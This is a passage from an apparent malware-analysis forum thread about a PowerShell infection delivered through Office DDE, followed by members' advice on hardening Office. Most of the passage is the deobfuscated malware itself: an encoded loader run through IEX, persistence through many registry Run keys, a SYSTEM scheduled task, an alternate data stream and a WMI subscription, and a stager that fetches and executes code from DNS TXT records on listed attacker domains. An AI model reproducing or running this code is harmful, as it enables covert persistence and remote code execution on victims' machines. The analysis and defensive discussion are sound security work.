ZkfCpsyBgdsSHlNONppejOyrM3fhahW/GawPvokbE6mJgp8I9TK6aaY9cL93baMi8RNpONZiq/OqLVCAPpZD6j9rb402xWHTGKHWGOJzrjNKMnSIn1NXUs2u
3IMaiI2cgppmxMC0BHhT0FhXHtZLULoLcL0SQwppsNCopCd8ZciZrF/gNFHicEzRQX6s8FPsljjdiSVhA6LZXR8/7/o7+NyKkNvqMWo6CnSZPTG4oaZ5CI6d
ksIbFYYOdiR40r2CJlfc81GRPaUWinzj60cza3kmcacudYjZyduKtwzYjtRrmByGnetFUgu0uXC41g2QqQXSZZ+rNf8c2C2Rj23dBYM9cyCt3mdSBHHF1QJR
bdzLdpXBX29vf3twp7qmxWx61PI1YAYnu7u9t7kQJcVbiiAn0UpS2gtLW7N99+5klkLgJ8C9O220Id6iBhbludljaQdr0bSCv8BtLJUoyiziLjmHPXvDB77m
drwxeCDSjuKXaHX5SbWxn9BKp9gq0FAW7Z+OxH2FfMBmtG52psqp+rZiXO27UWTZtp+n/0UF5jX91LCWsnX0raXib6aiMpidPrX1dQNnd71jf+yZU1wVWHhf
7mSsl+g+qbVeUi7Vw1+SqGA9mvUMyvnvw2kP3jNVdREbpnrYlv0OdaPfnXX0XtdVdx+rqedPq6nlR/Xenrryv9BZB3QXoijvFXS/oOPqXoYv5JxVX9NVgoaM
uIDy6WfBacrPQNHfbSNNQl99pv4CKfY8ROiFZx7PMBCni7bo3xUR7XsFUFU3fZiV4NTD9i36j0xAkgtgo8HOVxTuwL2iDwA5qZgbh/ATOzDlzdLQAA');$ms
=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0);$cs=New-Object System.IO.Compression.GZ
ipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);IEX $sr.rea
dtoend();
'@
$stgBytes = [System.Text.Encoding]::Unicode.GetBytes($ServiceCode)
$stgB64 =[Convert]::ToBase64String($stgBytes)
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name 'IE' -Value $stgB64 -force
$stagerCode = @'
$b64=(Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop').IE;$stCode=[System.Text.Encoding]::Unicode.GetString([System
.Convert]::FromBase64String($b64));[System.Threading.Mutex]$m;[bool]$mtmp=$false;$m=New-Object System.Threading.Mutex($t
rue, [string]1823821749, [ref] $mtmp);if(!$mtmp){exit;}IEX $stCode;
'@
$eCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($stagerCode))
try{New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell.exe -ep b
ypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'IE' -Value "powershell.exe -
ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices' -Name 'IE' -Value "powershell.e
xe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion' -Name 'IE' -Value "powershell.exe -ep bypas
s -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell.exe -ep b
ypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
New-ItemProperty -Path 'HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'IE' -Value "powershell
.exe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'IE' -Value "powershell.e
xe -ep bypass -noni -w hidden -e $eCmd" -force
} catch{}
try{New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Services\VxD' -Name 'IE' -Value "powershell.exe -ep bypass -n
oni -w hidden -e $eCmd" -force
} catch{}
try{New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
New-ItemProperty -Path 'HKCR:\vbsfile\shell\open\command' -Name 'IE' -Value "powershell.exe -ep bypass -noni -w hidden -
e $eCmd" -force
} catch{}
function Invoke-PrepareScheduledTask
{ $taskName = 'IE'
 $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
 if ($task -ne $null)
 {  Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
 }
 $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-ep bypass -noni -w hidden -e $eCmd"
 $trigger = New-ScheduledTaskTrigger -AtStartup -RandomDelay 00:00:30
 $settings = New-ScheduledTaskSettingsSet -Compatibility Win8
 $principal = New-ScheduledTaskPrincipal -UserId SYSTEM -LogonType ServiceAccount -RunLevel Highest
 $definition = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -Descriptio
n "Run $($taskName) at startup"
 Register-ScheduledTask -TaskName $taskName -InputObject $definition
 $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
 $psVersion = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
 $adsDir = $env:programdata + '\Windows'
 $adsModuleName = 'kernel32.dll'
 if ($psVersion -gt 2)
 {  Set-Content -Path $adsDir -Value $ServiceCode -Stream 'kernel32.dll'
 }
 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
 if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
 {
  $filterName = 'kernel32_Filter';
  $consumerName = 'kernel32_Consumer';

  Get-WmiObject __eventFilter -namespace root\subscription | Remove-WmiObject
  Get-WmiObject CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
  Get-WmiObject __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
  $filterResult = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace 'root\subscription' -Class __EventFilter -A
rguments @{Name = $filterName; EventNamespace = 'root\CIMV2'; QueryLanguage = 'WQL'; Query = "Select * from __InstanceCr
eationEvent within 30 where targetInstance isa 'Win32_LogonSession'"}
  if ($psVersion -gt 2)
  {$encCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX `$(Get-Content -Path $adsDir -Strea
m $adsModuleName|Out-String)"))
  Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace 'root\subscription' -Class CommandLineEventConsumer -Argume
nts @{Name = $consumerName; ExecutablePath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLineTem
plate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noni -w hidden -e $encCmd "}
  }
 }
 if ($task -ne $null)
 {  Write-Output "Created scheduled task: '$($task.ToString())'."
 }
 else
 {  Write-Output 'Created scheduled task: FAILED.'
 }}
Invoke-PrepareScheduledTask
IEX $stagerCode
.
The first decoded fragment was encoded similarly as the initial code, so I did the same trick to see:
Code: 
0
${_/\____/\/==\____} = 100
function Download-Big-TXT
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]$DomainList, [Parameter(ValueFromPipeline=$True)]${___/\/\/\
__/==\_/=});
${_/\____/\/\__/\/=} = '';
${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
${/==\/\____/=\/\/\} = 0;
${_/===\_/=\___/\/\_} = "$(_/===\/\__/\_/\_/=).${___/\/\/\__/==\_/=}.${/==\/\____/=\/\/\}.${_/\/\/=\____/====}";
${__/\/==\/\/\_____} = _/==\/\_/\__/\/=== ${_/===\_/=\___/\/\_};
if (${__/\/==\/\/\_____} -eq 0) { return 0
}
while (${__/\/==\/\/\_____} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAuADAALgAwAC4AMAA=')
)))
{ Write-Host $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String
('SQBwADoAIAAkAHsAXwBfAC8AXAAvAD0APQBcAC8AXAAvAFwAXwBfAF8AXwBfAH0A')));
 ${_/====\/=\/\/=\/=} = ___/=\___/====\__/ ${__/\/==\/\/\_____};
 ${___/\/\/\_/=\__/\} = _/=\/=\/\/====\__/ ${_/====\/=\/\/=\/=};
 Write-Host ${___/\/\/\_/=\__/\};
 ${/==\/\/\_/\___/=\} = (_/=\___/==\/=\/\/\ ${_/===\_/=\___/\/\_}) -join '';
 if (${/==\/\/\_/\___/=\} -eq 0) {  return 0
 }
 ${_/\_/\_/\/\/===\/} = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;
 ${/=====\_/\___/\__} = (${_/\_/\_/\/\/===\/}.ComputeHash([system.Text.Encoding]::UTF8.GetBytes(${/==\/\/\_/\___/=\})) |
 foreach{$_.ToString("X2") }) -join "";
 ${/=\/=====\/\_/\_/} = ___/==\_____/==\/\ ${/=====\_/\___/\__}.Substring(0, 8) | _/=\/=\/\/====\__/; if([string]${___/\
/\/\_/=\__/\} -eq [string]${/=\/=====\/\_/\_/})
 { ${_/\____/\/\__/\/=} += ${/==\/\/\_/\___/=\};
 ${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
 ${/==\/\____/=\/\/\}++;
 }
 ${_/===\_/=\___/\/\_} = "$(_/===\/\__/\_/\_/=).${___/\/\/\__/==\_/=}.${/==\/\____/=\/\/\}.${_/\/\/=\____/====}";
 ${__/\/==\/\/\_____} = _/==\/\_/\__/\/=== ${_/===\_/=\___/\/\_};
 if (${__/\/==\/\/\_____} -eq 0) {  return 0
 }}
return [string]${_/\____/\/\__/\/=};
}
function _/===\/\/\/======\
{param([array]$DomainList)
if($DomainList.count -eq 1)
{ return $DomainList;
}
return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)];
}
function _/===\/\__/\_/\_/=()
{${/=\/==\/=\/\/\/=\} = gwmi Win32_BIOS | Select -ExpandProperty SerialNumber ;
${_/\_/\_/\/\/===\/} = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;
${/=====\_/\___/\__} = (${_/\_/\_/\/\/===\/}.ComputeHash([system.Text.Encoding]::UTF8.GetBytes(${/=\/==\/=\/\/\/=\})) |
%{$_.ToString("X2") }) -join "";
return ${/=====\_/\___/\__}.Substring(0, 10);
}
function ___/\/\/==\/\____/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)][array]$DomainList, [scriptblock]${__/===\___/\_/=\__});
if((-not $DomainList) -or ($DomainList.count -eq 0))
{ Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAZABvAG0AYQBpAG4AcwA=')));
}
 ${_/\/\/=\____/====} = _/===\/\/\/======\ $DomainList;
try
{ return &${__/===\___/\_/=\__} -Domain ${_/\/\/=\____/====};
}
catch
{ Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64Strin
g('RQByAHIAbwByADoAIAAkAGUAcgByAG8AcgA=')));
 return ___/\/\/==\/\____/ ([array]($DomainList | ? {$_ -ne ${_/\/\/=\____/====} })) ${__/===\___/\_/=\__};
}}
function _/==\/\_/\__/\/===
{[CmdletBinding()] param([Parameter()]${_/===\_/=\___/\/\_});
Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
'WwBEAE4AUwBdACAAKABBACkAIAA9AD0APgAgACQAewBfAC8APQA9AD0AXABfAC8APQBcAF8AXwBfAC8AXAAvAFwAXwB9AA==')));
${_/\/\/=\_/\/\/=\_} = nslookup -type=a ${_/===\_/=\___/\/\_} 2>&1;
${__/\_/\__/\/\/==\} = [regex] $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]
::FromBase64String('XABzACoAJAB7AF8ALwA9AD0APQBcAF8ALwA9AFwAXwBfAF8ALwBcAC8AXABfAH0AKAAuAGwAbwBjAGEAbABkAG8AbQBhAGkAbgAp
ACoAXABzACoAQQBkAGQAcgBlAHMAcwAoAGUAcwApACoAOgBcAHMAKgAoAFsAXABkAFwALgBdACoAKQA=')));
${/====\__/\_/=\___} = ${__/\_/\__/\/\/==\}.Match(${_/\/\/=\_/\/\/=\_});
${_/=\/==\/\____/=\} = 0
while ((-not ${/====\__/\_/=\___}.Success) -and (${_/\____/\/==\____} -ne ${_/=\/==\/\____/=\})){ sleep -s 5
 ${_/=\/==\/\____/=\} = ${_/=\/==\/\____/=\} + 1
 ${_/\/\/=\_/\/\/=\_} = nslookup -type=a ${_/===\_/=\___/\/\_} 2>&1;
 ${__/\_/\__/\/\/==\} = [regex] $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert
]::FromBase64String('XABzACoAJAB7AF8ALwA9AD0APQBcAF8ALwA9AFwAXwBfAF8ALwBcAC8AXABfAH0AKAAuAGwAbwBjAGEAbABkAG8AbQBhAGkAbgA
pACoAXABzACoAQQBkAGQAcgBlAHMAcwAoAGUAcwApACoAOgBcAHMAKgAoAFsAXABkAFwALgBdACoAKQA=')));
 ${/====\__/\_/=\___} = ${__/\_/\__/\/\/==\}.Match(${_/\/\/=\_/\/\/=\_});
}
if (-not ${/====\__/\_/=\___}.Success) { return 0
}
return ${/====\__/\_/=\___}.Groups[3].Value;
}
function _/=\___/==\/=\/\/\
{[CmdletBinding()]param([Parameter()]${_/===\_/=\___/\/\_});
Write-Debug $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
'WwBEAE4AUwBdACAAKABUAFgAVAApACAAPQA9AD4AIAAkAHsAXwAvAD0APQA9AFwAXwAvAD0AXABfAF8AXwAvAFwALwBcAF8AfQA=')));
${_/\/\/=\_/\/\/=\_} = nslookup -type=txt ${_/===\_/=\___/\/\_} 2>&1;
${__/\_/\__/\/\/==\} = [regex] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KAAiAFsAXgBcAHMAXQAqACI
AXABzACoAKQArAA==')));
${/==\/=\/===\/==\_} = ${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_});
${_/=\/==\/\____/=\} = 0
while ((${/==\/=\/===\/==\_}.count -eq 0) -and (${_/\____/\/==\____} -ne ${_/=\/==\/\____/=\})){ sleep -s 5
 ${_/=\/==\/\____/=\} = ${_/=\/==\/\____/=\} + 1
 ${_/\/\/=\_/\/\/=\_} = nslookup -type=txt ${_/===\_/=\___/\/\_} 2>&1;
 ${__/\_/\__/\/\/==\} = [regex] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KAAiAFsAXgBcAHMAXQAqAC
IAXABzACoAKQArAA==')));
 ${/==\/=\/===\/==\_} = ${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_});
}
if (${/==\/=\/===\/==\_}.count -eq 0) { return 0
}
return (${__/\_/\__/\/\/==\}.Matches(${_/\/\/=\_/\/\/=\_}) | Select -ExpandProperty Value) -join '' -replace '"' -replac
e '`n' -replace ' ';
}
function _/==\_/\_/=\/=\___
{[CmdletBinding()]Param ([Parameter(Mandatory=$True,ValueFromPipeline=$True,ValueFromPipelineByPropertyName=$True)][byte
[]] $byteArray = $(Throw($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LQBiAHkAdABlAEEAcgByAGEAeQAgA
GkAcwAgAHIAZQBxAHUAaQByAGUAZAA='))))))
Process
{ ${/=\/\_/==\_/==\__} = New-Object System.IO.MemoryStream;
 ${/=\/\_/==\_/==\__}.Write($byteArray, 0, $byteArray.Length);
 $null = ${/=\/\_/==\_/==\__}.Seek(0,0);
 ${/======\_/=\__/=\} = New-Object System.IO.Compression.GZipStream(${/=\/\_/==\_/==\__}, [System.IO.Compression.Compres
sionMode]::Decompress);
 ${_/\___/==\/\/==\_} = New-Object System.IO.MemoryStream;
 ${_/\/===\/==\/\__/} = New-Object System.IO.StreamReader(${/======\_/=\__/=\}, [system.Text.Encoding]::UTF8);
 echo ${_/\/===\/==\/\__/}.readtoend();
}}
function _/==\_/\/=\__/=\_/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${_/====\/\/=\___/\/});
if (${_/====\/\/=\___/\/} -eq 0) { return 0
}
${__/\__/==\/\/====} = [System.Convert]::FromBase64String(${_/====\/\/=\___/\/});
return _/==\_/\_/=\/=\___(${__/\__/==\/\/====});
}
function Get-Stage-PS
{[CmdletBinding()]param([Parameter()]$DomainList);
return ___/\/\/==\/\____/ $DomainList
{return _/=\___/==\/=\/\/\ "$(_/===\/\__/\_/\_/=).stage.${_/\/\/=\____/====}" | _/==\_/\/=\__/=\_/; };};
function ___/\_____/====\__
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]$DomainList);
return Download-Big-TXT $DomainList $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAZwBlAA==')
)) | _/==\_/\/=\__/=\_/;
}
function ___/==\_____/==\/\
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]${__/=\/==\_/=\/\___});
${_/\/==\_/\_/\/\_/} = @{ '0' = 0;
 '1' = 1;
 '2' = 2;
 '3' = 3;
 '4' = 4;
 '5' = 5;
 '6' = 6;
 '7' = 7;
 '8' = 8;
 '9' = 9;
 'A' = 10;
 'B' = 11;
 'C' = 12;
 'D' = 13;
 'E' = 14;
 'F' = 15;
};
${/=\/==\/=====\/=\} = "${__/=\/==\_/=\/\___}".Length;
${_/===\_/\/\/\__/=} = ${/=\/==\/=====\/=\};
[uint64]${/==\/==\__/=\/\__} = 0;
while (${/=\/==\/=====\/=\} -ne 0)
{ ${/=\/==\/=====\/=\}--;
 ${___/=\/\_/=\/====} = ${_/\/==\_/\_/\/\_/}[[string]${__/=\/==\_/=\/\___}[${/=\/==\/=====\/=\}]];
 ${_/=====\/=\/\__/\} = _/=====\_/\/====== 16 (${_/===\_/\/\/\__/=} - ${/=\/==\/=====\/=\} - 1);
 ${/==\/==\__/=\/\__} += [uint64]([uint64]${___/=\/\_/=\/====} * [uint64]${_/=====\/=\/\__/\});
}
return ${/==\/==\__/=\/\__};
}
function _/=====\_/\/======
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]${__/\/=\/==\/\/\/=\}, [Parameter(ValueFromPipeline=$True)]
${_/=\_/==\___/\__/\});
return [Math]::Pow(${__/\/=\/==\/\/\/=\}, ${_/=\_/==\___/\__/\});
}
function _/=\/=\/\/====\__/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${_/==\__/\_/====\_/});
return [convert]::ToString(${_/==\__/\_/====\_/},2);
}
function ___/=\___/====\__/
{[CmdletBinding()]param([Parameter(ValueFromPipeline=$True)]${___/=====\/=\/\_/\});
${_/\/\_/=====\___/} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBa
se64String('JAB7AF8AXwBfAC8APQA9AD0APQA9AFwALwA9AFwALwBcAF8ALwBcAH0A'))).Split(".");
${/=\/=\_/=\___/\__} = [uint64]([uint64]${_/\/\_/=====\___/}[0] * 16777216);
${_/=\__/=\/\/\/\__} = [uint64]([uint64]${_/\/\_/=====\___/}[1] * 65536);
${_/=\/=\/\____/==\} = [uint64]([uint64]${_/\/\_/=====\___/}[2] * 256);
${_/\/=\_/=\__/=\/=} = ${_/\/\_/=====\___/}[3];
${/=\_/\__/\/=\___/} = ${/=\/=\_/=\___/\__} + ${_/=\__/=\/\/\/\__} + ${_/=\/=\/\____/==\} + ${_/\/=\_/=\__/=\/=};
return ${/=\_/\__/\/=\___/};
}
function Int-To-Ip
{[CmdletBinding()] param([Parameter(ValueFromPipeline=$True)]$uint);
${/=\/=\_/=\___/\__} = [uint64]([uint64]$uint / 16777216) % 256;
${_/=\__/=\/\/\/\__} = [uint64]([uint64]$uint / 65536) % 256;
${_/=\/=\/\____/==\} = [uint64]([uint64]$uint / 256) % 256;
${_/\/=\_/=\__/=\/=} = [uint64]([uint64]$uint) % 256;
return [string]${/=\/=\_/=\___/\__} + '.' + [string]${_/=\__/=\/\/\/\__} + '.' + [string]${_/=\/=\/\____/==\} + '.' + [s
tring]${_/\/=\_/=\__/=\/=};
}
${__/\/\/========\/} = @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBwAHcA'))),$([Text.
Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetStr
ing([Convert]::FromBase64String('bgBzADAALgBzAHAAYQBjAGUA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64
String('bgBzADAALgB3AGUAYgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADEAL
gBwAHIAZQBzAHMA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADEALgB3AGUAYgBzAGkAdABlAA==')
)),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADIALgBwAHIAZQBzAHMA'))),$([Text.Encoding]::Uni
code.GetString([Convert]::FromBase64String('bgBzADMALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]:
:FromBase64String('bgBzADMALgBzAHAAYQBjAGUA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzAD
QALgBzAGkAdABlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADQALgBzAHAAYQBjAGUA'))),$(
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADUALgBiAGkAegA='))),$([Text.Encoding]::Unicode.GetS
tring([Convert]::FromBase64String('bgBzADUALgBvAG4AbABpAG4AZQA='))),$([Text.Encoding]::Unicode.GetString([Convert]::From
Base64String('bgBzADUALgBwAHcA'))));
try
{${_/\____/\/\__/\/=} = ___/\_____/====\__(${__/\/\/========\/}); iex ${_/\____/\/\__/\/=};
}
catch
{Write-Debug $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBNAGEAaQBuAF0AIABHAGUAbgBlAHIAYQBsACAAZ
gBhAGkAbAB1AHIAZQA=')));
Write-Host $Error[0];
}
.
There are some encoded commands left, but they can be simply decoded by using commands from the above source code, for example:
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBwAHcA')) -> ns0.pw
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAGkAdABlAA==')) -> ns0.site
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgBzAHAAYQBjAGUA')) -> ns0.space
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBzADAALgB3AGUAYgBzAGkAdABlAA==')) -> ns0.website
...
Hope it will help somebody.:)
 
Last edited:
  • Like
Reactions: Solarquest, Daniel Keller, vemn and 10 others
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
Last edited:
  • Like
Reactions: Solarquest, Daniel Keller, vemn and 4 others
vemn

vemn

Level 6
Verified
Malware Hunter
Well-known
Feb 11, 2017
264
Hi @Andy Ful , thank you so much for dissecting this new attack leveraging MS DDE.

Just wondering from a...ehemmm... IT Security engineer, what will be my recommendation to my boss on how to protect against this?
- It still comes down to powershell and disabling it should be sufficient?
- Or disabling DDE (though I'm not sure what will the implication)
- Or creating a more granular HIPS or Access Control rule (whatever you call it on whichever product) to detect things like Winword.exe running another exe (cscript/powershell/cmd/wscript).

What will be the effective way to stop this? Anyone can advise please?
 
  • Like
Reactions: harlan4096, XhenEd, frogboy and 1 other person
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
Here are some good references how to harden Microsoft Office:
Security policies and settings in the 2007 Office system
Office Customization Tool in Office 2010
Group Policy Administrative Template files (ADMX, ADML) and Office Customization Tool (OCT) files for Office 2013
Generally, not trusted Office documents should not use: VBA macros and spawn processes other than Office applications. So, they should run in a kind of sandbox. Also, there should be a secured share center for trusted Office documents which could be opened outside this Sandbox.
In Office 2010+ the user can open not trusted documents in Protected View (Sandbox). The Protected View can be configured to suit the security and usability requirements.
Also, I think that something like Bouncer or MemProtect (Excubits software), ReHips or Sandboxie (paid) could be used to protect Office applications.
For viewing PDF documents I can recommend STDU Viewer.
.
In Windows 10, the user can simply use free Universal Applications (Windows Store) : Word Mobile, PowerPoint Mobile, Excel Mobile , for viewing documents (Sandbox = AppContainer) and Edge (Sandbox = AppContainer) + Office Online addon for editing documents (Edge allows viewing PDF documents, too).
.
See also: Q&A - Need your input for NEW zero config application sandbox
 
Last edited:
  • Like
Reactions: Solarquest, Daniel Keller, Sunshine-boy and 1 other person
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
There are also some other solutions (default deny) like NVT Exe Radar Pro, AppGuard, Comodo Firewall, Hard_Configurator. But, they are directed to secure all applications, not particularly Office applications.
Edit.
Post edited on NVT ERP.
 
Last edited:
  • Like
Reactions: Daniel Keller
5

509322

Andy Ful said:
Pure Anti-exe solutions can mitigate Office documents infections, but cannot stop the macros.
There are also some other solutions (default deny) like AppGuard, Comodo Firewall, Hard_Configurator. But, they are directed to secure all applications, not particularly Office applications.
Click to expand...

Unless a home user has a definite need to use Office, they shouldn't. There are better alternatives for what the typical home user needs from a productivity suite and by not using Office it greatly reduces security risks.

If you don't want to accidently shoot yourself, then don't pick up the gun - ever.
 
  • Like
Reactions: Andy Ful and Drexciya
Andy Ful

Andy Ful

From Hard_Configurator Tools
Thread author
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,513
Lockdown said:
Unless a home user has a definite need to use Office, they shouldn't. There are better alternatives for what the typical home user needs from a productivity suite and by not using Office it greatly reduces security risks.

If you don't want to accidently shoot yourself, then don't pick up the gun - ever.
Click to expand...
That is very true for home users.:)
More problems have the companies because often they cannot change the Office applications.
I edited slightly my previous post.
 
You must log in or register to reply here.

Similar threads

DardiM
    • Like
Malware Analysis Invoice_Viewer.js - Decoder built using a special random function - payload: cerber
Replies
11
Views
2,057
Malware Analysis Archive
DardiM
DardiM
DardiM
    • Like
Malware Analysis Deobfuscation based on a random method to get 2 x working js methods - js/donwloader - cerber
Replies
7
Views
1,829
Malware Analysis Archive
tim one
T
DardiM
    • Like
Malware Analysis ¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js - big puzzle familly - updated with Jan,14 2017 version
Replies
12
Views
3,938
Malware Analysis Archive
DardiM
DardiM

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top